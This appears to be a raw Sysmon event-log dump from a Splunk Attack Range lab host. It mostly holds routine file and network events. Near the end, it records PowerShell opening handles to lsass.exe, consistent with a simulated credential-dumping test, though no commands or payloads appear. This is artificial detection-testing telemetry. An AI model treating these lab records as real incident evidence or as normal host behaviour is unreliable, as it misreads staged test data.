Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7C9DD6A68059FE3978E5C154DACA4412,SHA256=31A783C6350923C8A5B39D65836F007572E52E030329A388AEE3E3C0AD4038EE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085754Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:49.806{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\datareporting\glean\db\data.safe.binMD5=3EA02E9EEE7E2376AA9E5CD5C1E99BF3,SHA256=911ADF98871C1E2CC7AD07EE35CF40FCAD4E79EADC9DA31A75160935CEB7508F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085753Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:49.806{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\datareporting\glean\db\data.safe.binMD5=56B021BD914B9A737721564692C54D42,SHA256=DBE30C48C925850A5AF64F9F98944C8016C880DB8738DC58F837278BE678A8E9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085752Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:49.806{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\datareporting\glean\db\data.safe.binMD5=C106703DA264DF32B5C46F781210CAA0,SHA256=6FAE0E733B0CEEA09CCBC033A932A92FE50F9329F39FCA2B1544FEC0E6527A90,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085751Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:49.806{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\datareporting\glean\db\data.safe.binMD5=16C2D4A07366CC71B004C0B16A366B9A,SHA256=D97B1FBD2F31F0687B6DB6A71BFC156D237E62C7C55037133AE7D665779C9F7E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085750Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:49.806{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\datareporting\glean\db\data.safe.binMD5=7BDC80D7FE49C382B10BE6D01BE82196,SHA256=6483589ADBB0D7E5ED638C0C0F58C1BB290F3CA3AC3B965D1FEEFC9EC57F1B10,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085749Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:49.806{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\datareporting\glean\db\data.safe.binMD5=A7EC48F9A55899A66851720ECE1B9959,SHA256=A893948ED8030668481EE4FFB88E24CFAAFDAB5123515E074B1D1D6FCC602BBF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085748Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:49.774{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6CE21B0C59A91A3D67A77196A50B9A90,SHA256=BEFD6098E1D3078A8CDCFD741C951B1B0B0D96412544911E25FE130021FB4187,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085747Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:49.690{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=CC5429B4FC5CC4085F0EEE202DF764ED,SHA256=4DF4485CD6233D16785CC54953ACF73618DE8572D3A1801AD04611B770E12269,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085746Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:13.265{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56760-false10.0.1.12-8000- 23542300x800000000000000035085756Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:50.789{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=268E122916EF31ADD7209D56CDF6AC08,SHA256=AE86253A5EA4EE3481BE3015A4707156520D30797D8C18392FB773271E7A951D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085755Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:14.686{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56761-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035085757Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:51.820{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0CB186EF71C6A9E0089C494DB4BB14D9,SHA256=496EF8B6E7DE36CA14D6C0AFADEF6C1270AFC5F8F2991F5DEFA933822FFCA68A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085758Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:52.837{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=689E8A0CF8EB9AC54180D4662B97D0D8,SHA256=D48C904AC52BE18CD74CE95070FF60BFF976CCF6BBC7F176421E8E8B1AF37CCE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085759Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:53.855{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AD2C2526F9DE9A6F06D124C0A6FF3C4F,SHA256=187062AE258C185885DF1BCB885D3D533A635D8A6FBE2FA51B10D1CEB5BC1ABB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085767Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:54.970{B81B27B7-4013-611D-2700-00000000C801}2076NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=9D45E1BDB6F237A6CF51FFC6A12E6130,SHA256=87EEE278CDF62B2B86AF9CB87BDB04BAFB10272CEA175D83979B0C43158C5AB9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085766Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:54.870{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=67F0A8EF80D4A197974B6324A5314C7A,SHA256=334D7EAFA138216D9F83C294C5984E6DF91ADBA2AC9C5A478B6819CB2D9822CB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085765Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:54.817{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\datareporting\glean\db\data.safe.binMD5=BA27512897D7E35624A7947CD0B4C39E,SHA256=E86B2595A0DD073B99F477E58661F93C96EFB9E94E3DC5283D501875BA374504,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085764Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:54.817{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\datareporting\glean\db\data.safe.binMD5=F9226FA856F7C7F1531E096CD38AA49C,SHA256=3998FD789C6A159A8E9E64E454457FCAAF1582B3954486B606E86F210B21C016,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085763Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:54.817{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\datareporting\glean\db\data.safe.binMD5=EC2C440164694A92DBA5B7D899FE149E,SHA256=70EEBF6E2237292B14AE68F7BF18B171004B0E9A73B16167B7E77DF96470EAD3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085762Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:54.817{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\datareporting\glean\db\data.safe.binMD5=5A56634C9670F2B0E26A901DFBF5755D,SHA256=351E36064BBC615116EF9C7A7C51525CEEFE8FE2FF7FF1DD2DD20F5CA844E551,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085761Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:54.817{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\datareporting\glean\db\data.safe.binMD5=C3EA23DD0042C74AD102F5A0C2E70F4A,SHA256=31014CDA059872EEA4A9D08AEB3AD35F04D8A579D87252862B17B72B5F22292D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085760Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:54.817{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\datareporting\glean\db\data.safe.binMD5=C5886E2F93EED3ED26151757B7EC1285,SHA256=05409BB4D006D2D2E72B1BAFDC3FD02223DEC43129CF51FDF890F939351BFA58,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085770Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:55.916{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7E003AA81F6ECACA9800D69ABE9082A3,SHA256=F54D079FD2C0EEFD1F427FF12B26B80331A9A9CC74AD2B3201D5EA945B14B1B7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085769Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:55.701{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=EA4B5251001785C93D91BCEE1ACAAD19,SHA256=95DEEB24ACBCF4BD2CB477B81F4510BF3346D1D028250EBAE6BFF8DBD1ACF9C0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085768Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:19.097{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56762-false10.0.1.12-8000- 23542300x800000000000000035085773Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:56.935{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C50F4F25F02998BB412AE9347F9852F6,SHA256=CA1B58BC0F007C89232A0C66A16B5EF9AA58814E6896EE6EE3D18F9CA6EEF055,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085772Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:20.979{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56764-false10.0.1.12-8089- 354300x800000000000000035085771Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:20.696{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56763-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035085774Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:57.967{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F6282D581C3E7531C6AF90DE3AD8974E,SHA256=19BEB0926E536C101CF56C223BBDC3477C1034BFCC936AB795DC997058D992BA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085775Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:58.982{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E0A64A3D36BC568471AF8E6D76D466CD,SHA256=A8F7D27C4A0AD4C71D241BC9BA442CEBBD070E1E55C24DB6C1566CCA6FEBD176,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035085800Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:59.935{B81B27B7-4013-611D-1600-00000000C801}11961436C:\Windows\system32\svchost.exe{B81B27B7-4F9B-613A-7290-03000000C801}3876C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085799Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:59.935{B81B27B7-4013-611D-1600-00000000C801}11961244C:\Windows\system32\svchost.exe{B81B27B7-4F9B-613A-7290-03000000C801}3876C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085798Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:59.881{B81B27B7-4012-611D-0B00-00000000C801}6365724C:\Windows\system32\lsass.exe{B81B27B7-4F9B-613A-7290-03000000C801}3876C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085797Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:59.881{B81B27B7-4012-611D-0B00-00000000C801}6365724C:\Windows\system32\lsass.exe{B81B27B7-4F9B-613A-7290-03000000C801}3876C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 17141700x800000000000000035085796Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-CreatePipe2021-09-09 18:16:59.865{B81B27B7-4F9B-613A-7290-03000000C801}3876\PSHost.132756850197105595.3876.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x800000000000000035085795Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:59.849{B81B27B7-4F9B-613A-7290-03000000C801}3876ATTACKRANGE\REED_SCHMIDTC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\reed_schmidt\AppData\Local\Temp\2\__PSScriptPolicyTest_g531ucal.yj3.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085794Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:59.849{B81B27B7-4F9B-613A-7290-03000000C801}3876ATTACKRANGE\REED_SCHMIDTC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\reed_schmidt\AppData\Local\Temp\2\__PSScriptPolicyTest_wkuhoeku.qlm.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000035085793Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:59.834{B81B27B7-4F9B-613A-7290-03000000C801}3876C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\reed_schmidt\AppData\Local\Temp\2\__PSScriptPolicyTest_wkuhoeku.qlm.ps12021-09-09 18:16:59.834 10341000x800000000000000035085792Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:59.736{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4F9B-613A-7290-03000000C801}3876C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085791Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:59.712{B81B27B7-9957-6127-D045-01000000C801}53121524C:\Windows\system32\conhost.exe{B81B27B7-4F9B-613A-7290-03000000C801}3876C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085790Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:59.697{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085789Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:59.697{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085788Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:59.697{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085787Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 